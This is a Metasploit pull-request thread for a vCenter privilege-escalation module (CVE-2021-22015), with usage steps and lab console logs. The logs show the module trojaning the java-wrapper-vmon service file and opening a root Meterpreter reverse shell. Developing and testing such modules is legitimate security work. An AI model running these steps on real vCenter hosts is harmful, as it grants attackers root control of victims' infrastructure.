CVE-2021-22015 vCenter priv esc

[h00die]

Fixes #16489

This PR adds a priv esc for users in the cis group to escalate to root on certain versions of vCenter. A service file /usr/lib/vmware-vmon/java-wrapper-vmon has improper permissions allowing cis group members to write to it. Upon host reboot or vmware-vmon service restart, a root shell is obtained.

Verification

1. Start msfconsole
2. Obtain a shell on vCenter for a user in the cis group. (I used su vsphere-client off an SSH session)
3. Do: use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
4. Do: set session #
5. Do: run
6. Restart the host, or the service (systemctl restart vmware-vmon.service) with a user who has permission
7. You should get a root shell.

[h00die]

@U1traVio1et since you uploaded the code on https://github.com/PenteraIO/vScalation-CVE-2021-22015 wanted to make sure the vuln discoverer was properly credited.

[U1traVio1et]

@U1traVio1et since you uploaded the code on https://github.com/PenteraIO/vScalation-CVE-2021-22015 wanted to make sure the vuln discoverer was properly credited.

love this, thanks!

[bwatters-r7]

VCenter has an x86 version?

[h00die]

no idea, but x86 payloads do run on the appliance:

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

whoami
root
uname -a
Linux localhost.domain4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016 x86_64 GNU/Linux
vpxd -v
Traceback (most recent call last):
  File "/usr/sbin/cloudvm-ram-size", line 52, in <module>
    sys.path.append(os.environ['VMWARE_PYTHON_PATH'])
  File "/usr/lib/python2.7/UserDict.py", line 40, in __getitem__
    raise KeyError(key)
KeyError: 'VMWARE_PYTHON_PATH'
VMware VirtualCenter 6.5.0 build-7070488
^Z
Background session 1? [y/N]  y
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > sessions -l
                               
Active sessions                
===============                
                               
  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               1.1.1.1:4444 -> 2.2.2.2:57524 (2.2.2.2)

[bwatters-r7]

[*] Sending stage (3045348 bytes) to 10.5.132.113
[*] Meterpreter session 3 opened (10.5.135.201:4568 -> 10.5.132.113:58500) at 2022-12-01 10:41:15 -0600

msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer     : photon-machine.moose
OS           : VMware Photon 1.0 (Linux 4.4.228-1.ph1)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: vsphere-client
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > show options

Module options (exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /usr/lib/vmware-vmon/java-wrapper-vmon is writable and owned by cis group
[+] Original /usr/lib/vmware-vmon/java-wrapper-vmon backed up to /home/tmoose/.msf4/loot/20221201104214_default_10.5.132.113_javawrappervmo_010174.txt
[*] Writing payload to /tmp/.lRZPRgdUfG
[*] Writing '/tmp/.lRZPRgdUfG' (250 bytes) ...
[*] Writing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon
[*] Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)
[-] vmware-vmon service needs to be restarted, or host rebooted to obtain shell.
[*] Waiting 1800 seconds for shell
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 10.5.132.113
[+] Deleted /tmp/.lRZPRgdUfG
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.132.113:55654) at 2022-12-01 10:44:35 -0600
[*] Replacing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon with original

meterpreter > sysinfo
Computer     : photon-machine.moose
OS           : VMware Photon 1.0 (Linux 4.4.228-1.ph1)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

[bwatters-r7]

I was going to do a quick land on this, but it appears to be trashing my vCenter server?

I am resetting to a known-good state I used before to test this, so I'm not sure what's happening. It will be next week before I take another look. I did not want you to think I'd flaked out, though.

[h00die]

Is the cleanup working correctly? md5sum the file before and after?

[bwatters-r7]

Because it is no longer after 5 on a Friday, it appears to work fine?

msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : photon-machine.moose
OS           : VMware Photon 1.0 (Linux 4.4.228-1.ph1)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: vsphere-client
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > show options

Module options (exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set verbose true
verbose => true
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /usr/lib/vmware-vmon/java-wrapper-vmon is writable and owned by cis group
[+] Original /usr/lib/vmware-vmon/java-wrapper-vmon backed up to /home/tmoose/.msf4/loot/20221205085056_default_10.5.132.113_javawrappervmo_517372.txt
[*] Writing payload to /tmp/.YsHfTxSJ
[*] Writing '/tmp/.YsHfTxSJ' (250 bytes) ...
[*] Writing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon
[*] Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)
[-] vmware-vmon service needs to be restarted, or host rebooted to obtain shell.
[*] Waiting 1800 seconds for shell
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 10.5.132.113
[+] Deleted /tmp/.YsHfTxSJ
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.113:56462) at 2022-12-05 08:52:56 -0600
[*] Replacing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon with original

meterpreter > sysinfo
Computer     : photon-machine.moose
OS           : VMware Photon 1.0 (Linux 4.4.228-1.ph1)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

[bwatters-r7]

Yeah; I cannot seem to re-create what was happening Friday. Today, I can even restart the service when Friday, I had to reboot.

The original problem was that the service restart failed and I tried to reboot to kick off the privileged session, so the file would not have been returned to the original state, yet.
I verified today that I can restart the service or simply reboot and in both cases, I get the expected privileged shell; no sign of Friday's gremlins.

[h00die]

I'll also note that its set to ManualRanking for these reasons

[bwatters-r7]

Release Notes

This PR adds a priv esc for users in the cis group to escalate to root on certain versions of vCenter. A service file /usr/lib/vmware-vmon/java-wrapper-vmon has improper permissions allowing cis group members to write to it. Upon host reboot or vmware-vmon service restart, a root shell is obtained.